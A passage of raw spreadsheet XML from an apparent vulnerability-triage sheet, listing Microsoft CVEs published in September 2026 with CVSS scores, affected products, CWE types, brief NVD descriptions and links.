t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q183" s="5" t="inlineStr" /><c r="R183" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S183" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t></is></c></row><row r="184"><c r="A184" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C184" s="5" t="inlineStr"><is><t>CVE-2026-69778</t></is></c><c r="D184" s="5" t="n"><v>8.800000000000001</v></c><c r="E184" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F184" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G184" s="5" t="inlineStr" /><c r="H184" s="5" t="n"><v>0.008</v></c><c r="I184" s="5" t="inlineStr" /><c r="J184" s="5" t="inlineStr" /><c r="K184" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L184" s="5" t="inlineStr" /><c r="M184" s="5" t="inlineStr" /><c r="N184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P184" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q184" s="5" t="inlineStr" /><c r="R184" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S184" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t></is></c></row><row r="185"><c r="A185" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C185" s="5" t="inlineStr"><is><t>CVE-2026-69784</t></is></c><c r="D185" s="5" t="n"><v>8.800000000000001</v></c><c r="E185" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F185" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G185" s="5" t="inlineStr" /><c r="H185" s="5" t="n"><v>0.003</v></c><c r="I185" s="5" t="inlineStr" /><c r="J185" s="5" t="inlineStr" /><c r="K185" s="5" t="inlineStr" /><c r="L185" s="5" t="inlineStr" /><c r="M185" s="5" t="inlineStr" /><c r="N185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P185" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q185" s="5" t="inlineStr" /><c r="R185" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S185" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t></is></c></row><row r="186"><c r="A186" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C186" s="5" t="inlineStr"><is><t>CVE-2026-69797</t></is></c><c r="D186" s="5" t="n"><v>8.800000000000001</v></c><c r="E186" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G186" s="5" t="inlineStr" /><c r="H186" s="5" t="n"><v>0.008</v></c><c r="I186" s="5" t="inlineStr" /><c r="J186" s="5" t="inlineStr" /><c r="K186" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L186" s="5" t="inlineStr" /><c r="M186" s="5" t="inlineStr" /><c r="N186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P186" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q186" s="5" t="inlineStr" /><c r="R186" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S186" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t></is></c></row><row r="187"><c r="A187" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C187" s="5" t="inlineStr"><is><t>CVE-2026-69860</t></is></c><c r="D187" s="5" t="n"><v>8.800000000000001</v></c><c r="E187" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F187" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G187" s="5" t="inlineStr" /><c r="H187" s="5" t="n"><v>0.008</v></c><c r="I187" s="5" t="inlineStr" /><c r="J187" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K18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87" s="5" t="inlineStr" /><c r="M187" s="5" t="inlineStr" /><c r="N187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q187" s="5" t="inlineStr" /><c r="R187" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S187" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t></is></c></row><row r="188"><c r="A188" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C188" s="5" t="inlineStr"><is><t>CVE-2026-70203</t></is></c><c r="D188" s="5" t="n"><v>8.800000000000001</v></c><c r="E188" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F188" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G188" s="5" t="inlineStr" /><c r="H188" s="5" t="n"><v>0.008</v></c><c r="I188" s="5" t="inlineStr" /><c r="J188" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K18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88" s="5" t="inlineStr" /><c r="M188" s="5" t="inlineStr" /><c r="N188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P188" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q188" s="5" t="inlineStr" /><c r="R188" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S188" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t></is></c></row><row r="189"><c r="A189" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C189" s="5" t="inlineStr"><is><t>CVE-2026-70351</t></is></c><c r="D189" s="5" t="n"><v>8.800000000000001</v></c><c r="E189" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F189" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G189" s="5" t="inlineStr" /><c r="H189" s="5" t="n"><v>0.008</v></c><c r="I189" s="5" t="inlineStr" /><c r="J189" s="5" t="inlineStr" /><c r="K189" s="5" t="inlineStr" /><c r="L189" s="5" t="inlineStr" /><c r="M189" s="5" t="inlineStr" /><c r="N189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P189" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q189" s="5" t="inlineStr" /><c r="R189" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S189" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t></is></c></row><row r="190"><c r="A190" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C190" s="5" t="inlineStr"><is><t>CVE-2026-70586</t></is></c><c r="D190" s="5" t="n"><v>8.800000000000001</v></c><c r="E190" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F190" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G190" s="5" t="inlineStr" /><c r="H190" s="5" t="n"><v>0.008</v></c><c r="I190" s="5" t="inlineStr" /><c r="J190" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K19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90" s="5" t="inlineStr" /><c r="M190" s="5" t="inlineStr" /><c r="N190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P190" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q190" s="5" t="inlineStr" /><c r="R190" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S190" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t></is></c></row><row r="191"><c r="A191" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C191" s="5" t="inlineStr"><is><t>CVE-2026-71328</t></is></c><c r="D191" s="5" t="n"><v>8.800000000000001</v></c><c r="E191" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F191" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G191" s="5" t="inlineStr" /><c r="H191" s="5" t="n"><v>0.006</v></c><c r="I191" s="5" t="inlineStr" /><c r="J191" s="5" t="inlineStr" /><c r="K191" s="5" t="inlineStr"><is><t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t></is></c><c r="L191" s="5" t="inlineStr" /><c r="M191" s="5" t="inlineStr" /><c r="N191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P191" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q191" s="5" t="inlineStr" /><c r="R191" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S191" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t></is></c></row><row r="192"><c r="A192" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C192" s="5" t="inlineStr"><is><t>CVE-2026-71336</t></is></c><c r="D192" s="5" t="n"><v>8.800000000000001</v></c><c r="E192" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F192" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G192" s="5" t="inlineStr" /><c r="H192" s="5" t="n"><v>0.008999999999999999</v></c><c r="I192" s="5" t="inlineStr" /><c r="J192" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K192" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L192" s="5" t="inlineStr" /><c r="M192" s="5" t="inlineStr" /><c r="N192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P192" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q192" s="5" t="inlineStr" /><c r="R192" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S192" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t></is></c><c r="T192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t></is></c></row><row r="193"><c r="A193" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C193" s="5" t="inlineStr"><is><t>CVE-2026-71352</t></is></c><c r="D193" s="5" t="n"><v>8.800000000000001</v></c><c r="E193" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F193" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G193" s="5" t="inlineStr" /><c r="H193" s="5" t="n"><v>0.007</v></c><c r="I193" s="5" t="inlineStr" /><c r="J193" s="5" t="inlineStr" /><c r="K193" s="5" t="inlineStr" /><c r="L193" s="5" t="inlineStr" /><c r="M193" s="5" t="inlineStr" /><c r="N193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P193" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q193" s="5" t="inlineStr" /><c r="R193" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S193" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t></is></c><c r="T193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t></is></c></row><row r="194"><c r="A194" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C194" s="5" t="inlineStr"><is><t>CVE-2026-72933</t></is></c><c r="D194" s="5" t="n"><v>8.800000000000001</v></c><c r="E194" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F194" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G194" s="5" t="inlineStr" /><c r="H194" s="5" t="n"><v>0.008</v></c><c r="I194" s="5" t="inlineStr" /><c r="J194" s="5" t="inlineStr" /><c r="K194" s="5" t="inlineStr" /><c r="L194" s="5" t="inlineStr" /><c r="M194" s="5" t="inlineStr" /><c r="N194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P194" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q194" s="5" t="inlineStr" /><c r="R194" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S194" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t></is></c></row><row r="195"><c r="A195" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C195" s="5" t="inlineStr"><is><t>CVE-2026-72940</t></is></c><c r="D195" s="5" t="n"><v>8.800000000000001</v></c><c r="E195" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F195" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G195" s="5" t="inlineStr" /><c r="H195" s="5" t="n"><v>0.008</v></c><c r="I195" s="5" t="inlineStr" /><c r="J195" s="5" t="inlineStr" /><c r="K195" s="5" t="inlineStr" /><c r="L195" s="5" t="inlineStr" /><c r="M195" s="5" t="inlineStr" /><c r="N195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P195" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q195" s="5" t="inlineStr" /><c r="R195" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S195" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t></is></c></row><row r="196"><c r="A196" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C196" s="5" t="inlineStr"><is><t>CVE-2026-72950</t></is></c><c r="D196" s="5" t="n"><v>8.800000000000001</v></c><c r="E196" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F196" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G196" s="5" t="inlineStr" /><c r="H196" s="5" t="n"><v>0.008999999999999999</v></c><c r="I196" s="5" t="inlineStr" /><c r="J196" s="5" t="inlineStr" /><c r="K196" s="5" t="inlineStr" /><c r="L196" s="5" t="inlineStr" /><c r="M196" s="5" t="inlineStr" /><c r="N196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P196" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q196" s="5" t="inlineStr" /><c r="R196" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S196" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t></is></c></row><row r="197"><c r="A197" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C197" s="5" t="inlineStr"><is><t>CVE-2026-72959</t></is></c><c r="D197" s="5" t="n"><v>8.800000000000001</v></c><c r="E197" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F197" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G197" s="5" t="inlineStr" /><c r="H197" s="5" t="n"><v>0.008999999999999999</v></c><c r="I197" s="5" t="inlineStr" /><c r="J197" s="5" t="inlineStr" /><c r="K197" s="5" t="inlineStr" /><c r="L197" s="5" t="inlineStr" /><c r="M197" s="5" t="inlineStr" /><c r="N197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P197" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q197" s="5" t="inlineStr" /><c r="R197" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S197" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t></is></c></row><row r="198"><c r="A198" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C198" s="5" t="inlineStr"><is><t>CVE-2026-72960</t></is></c><c r="D198" s="5" t="n"><v>8.800000000000001</v></c><c r="E198" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F198" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G198" s="5" t="inlineStr" /><c r="H198" s="5" t="n"><v>0.008</v></c><c r="I198" s="5" t="inlineStr" /><c r="J198" s="5" t="inlineStr" /><c r="K198" s="5" t="inlineStr" /><c r="L198" s="5" t="inlineStr" /><c r="M198" s="5" t="inlineStr" /><c r="N198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P198" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q198" s="5" t="inlineStr" /><c r="R198" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S198" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t></is></c></row><row r="199"><c r="A199" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C199" s="5" t="inlineStr"><is><t>CVE-2026-72972</t></is></c><c r="D199" s="5" t="n"><v>8.800000000000001</v></c><c r="E199" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F199" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G199" s="5" t="inlineStr" /><c r="H199" s="5" t="n"><v>0.008</v></c><c r="I199" s="5" t="inlineStr" /><c r="J199" s="5" t="inlineStr" /><c r="K199" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L199" s="5" t="inlineStr" /><c r="M199" s="5" t="inlineStr" /><c r="N199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P199" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q199" s="5" t="inlineStr" /><c r="R199" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S199" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t></is></c></row><row r="200"><c r="A200" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C200" s="5" t="inlineStr"><is><t>CVE-2026-72973</t></is></c><c r="D200" s="5" t="n"><v>8.800000000000001</v></c><c r="E200" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G200" s="5" t="inlineStr" /><c r="H200" s="5" t="n"><v>0.008</v></c><c r="I200" s="5" t="inlineStr" /><c r="J200" s="5" t="inlineStr" /><c r="K200" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L200" s="5" t="inlineStr" /><c r="M200" s="5" t="inlineStr" /><c r="N200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P200" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q200" s="5" t="inlineStr" /><c r="R200" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S200" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t></is></c></row><row r="201"><c r="A201" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C201" s="5" t="inlineStr"><is><t>CVE-2026-72986</t></is></c><c r="D201" s="5" t="n"><v>8.800000000000001</v></c><c r="E201" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F201" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G201" s="5" t="inlineStr" /><c r="H201" s="5" t="n"><v>0.008</v></c><c r="I201" s="5" t="inlineStr" /><c r="J201" s="5" t="inlineStr" /><c r="K201" s="5" t="inlineStr" /><c r="L201" s="5" t="inlineStr" /><c r="M201" s="5" t="inlineStr" /><c r="N201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P201" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q201" s="5" t="inlineStr" /><c r="R201" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S201" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t></is></c></row><row r="202"><c r="A202" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C202" s="5" t="inlineStr"><is><t>CVE-2026-73006</t></is></c><c r="D202" s="5" t="n"><v>8.800000000000001</v></c><c r="E202" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F202" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G202" s="5" t="inlineStr" /><c r="H202" s="5" t="n"><v>0.008</v></c><c r="I202" s="5" t="inlineStr" /><c r="J202" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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202" s="5" t="inlineStr" /><c r="M202" s="5" t="inlineStr" /><c r="N202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P202" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q202" s="5" t="inlineStr" /><c r="R202" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S202" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t></is></c></row><row r="203"><c r="A203" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C203" s="5" t="inlineStr"><is><t>CVE-2026-73012</t></is></c><c r="D203" s="5" t="n"><v>8.800000000000001</v></c><c r="E203" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F203" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G203" s="5" t="inlineStr" /><c r="H203" s="5" t="n"><v>0.006</v></c><c r="I203" s="5" t="inlineStr" /><c r="J203" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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3" s="5" t="inlineStr" /><c r="M203" s="5" t="inlineStr" /><c r="N203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q203" s="5" t="inlineStr" /><c r="R203" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S203" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t></is></c></row><row r="204"><c r="A204" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C204" s="5" t="inlineStr"><is><t>CVE-2026-73013</t></is></c><c r="D204" s="5" t="n"><v>8.800000000000001</v></c><c r="E204" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G204" s="5" t="inlineStr" /><c r="H204" s="5" t="n"><v>0.006</v></c><c r="I204" s="5" t="inlineStr" /><c r="J204" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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4" s="5" t="inlineStr" /><c r="M204" s="5" t="inlineStr" /><c r="N204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P204" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q204" s="5" t="inlineStr" /><c r="R204" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S204" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t></is></c></row><row r="205"><c r="A205" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C205" s="5" t="inlineStr"><is><t>CVE-2026-73016</t></is></c><c r="D205" s="5" t="n"><v>8.800000000000001</v></c><c r="E205" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G205" s="5" t="inlineStr" /><c r="H205" s="5" t="n"><v>0.006</v></c><c r="I205" s="5" t="inlineStr" /><c r="J205" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K20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5" s="5" t="inlineStr" /><c r="M205" s="5" t="inlineStr" /><c r="N205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P205" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q205" s="5" t="inlineStr" /><c r="R205" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S205" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T205" s="6" 